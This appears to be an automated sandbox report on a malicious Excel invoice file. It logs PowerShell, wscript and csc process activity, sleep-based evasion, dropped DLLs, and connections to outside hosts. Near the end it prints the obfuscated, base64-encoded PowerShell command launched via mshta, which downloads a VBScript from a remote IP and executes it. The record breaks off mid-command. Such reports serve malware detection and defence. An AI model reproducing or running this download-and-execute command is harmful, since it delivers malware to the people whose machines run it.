            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
            Source: Invoice A037.xlsStream path 'MBD00090642/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
            Source: Invoice A037.xlsStream path 'Workbook' entropy: 7.99881984082 (max. 8.0)
            Source: CA430000.0.drStream path 'MBD00090642/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
            Source: CA430000.0.drStream path 'Workbook' entropy: 7.99874064823 (max. 8.0)
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
            Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-Timer
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8352Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1562Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1880Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7969Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1012
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 557
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1253
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6490
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\otto1awr\otto1awr.dllJump to dropped file
            Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oojbmfem\oojbmfem.dllJump to dropped file
            Source: C:\Windows\System32\mshta.exe TID: 3548Thread sleep time: -240000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep count: 8352 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3740Thread sleep count: 1562 > 30Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3916Thread sleep time: -120000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3920Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\System32\wscript.exe TID: 4060Thread sleep time: -300000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1264Thread sleep time: -60000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2240Thread sleep time: -8301034833169293s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2240Thread sleep time: -3600000s >= -30000sJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2240Thread sleep time: -600000s >= -30000sJump to behavior
            Source: C:\Windows\System32\mshta.exe TID: 1372Thread sleep time: -420000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2860Thread sleep count: 1012 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2376Thread sleep count: 557 > 30
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3948Thread sleep time: -180000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3368Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2032Thread sleep time: -1844674407370954s >= -30000s
            Source: C:\Windows\System32\wscript.exe TID: 3760Thread sleep time: -120000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3996Thread sleep time: -60000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004Thread sleep time: -16602069666338586s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4004Thread sleep time: -1200000s >= -30000s
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 600000
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Windows\System32\wscript.exeNetwork Connect: 45.63.94.214 443
            Source: C:\Windows\System32\wscript.exeDomain query: paste.rs
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2580, type: MEMORYSTR
            Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 3912, type: MEMORYSTR
            Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/C PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzIzLjk1LjIzNS4yOS84MDgvdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdob2lub25saW5ld2l0aC50SUYiLCIkRU52OkFQUERBVEFcdmVyeW5pY2VjcmVhbXljaGlja2VuZnZvdXJhdGVkaXNoZXNmb3JldmVyeW9uZXdoby52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7aU52b2tlLWV4cHJFc1Npb24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlbnY6QVBQREFUQVx2ZXJ5bmljZWNyZWFteWNoaWNrZW5mdm91cmF0ZWRpc2hlc2ZvcmV2ZXJ5b25ld2hvLnZiUyI='+[CHaR]34+'))')))"Jump to behavior
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe PowersHELl.eXE -EX ByPaSs -nop -W 1 -c deviCEcREdENTiaLDepLOYMent.eXE ; InVOkE-ExpRESsIOn($(InVoKE-EXpreSSiOn('[SysTEM.tEXt.ENcOdIng]'+[chaR]58+[ChAr]58+'uTf8.GETsTrInG([sysTEm.cOnVERt]'+[cHar]58+[char]0X3a+'FRoMBAse64StRinG('+[chAR]0x22+'JDZMOGwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBRGQtdFlQZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYkVSRGVGSW5pdGlPbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidXJsTU9uLmRsbCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgT3NoV2VtdixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVWVreVNwR3BtSixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2JkU3pCT3AsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsWmZpS2tRbmFKcixJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWFRmY2pmKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJYb0UiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lU3BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdUxxaHlmQUsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkNkw4bDo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaH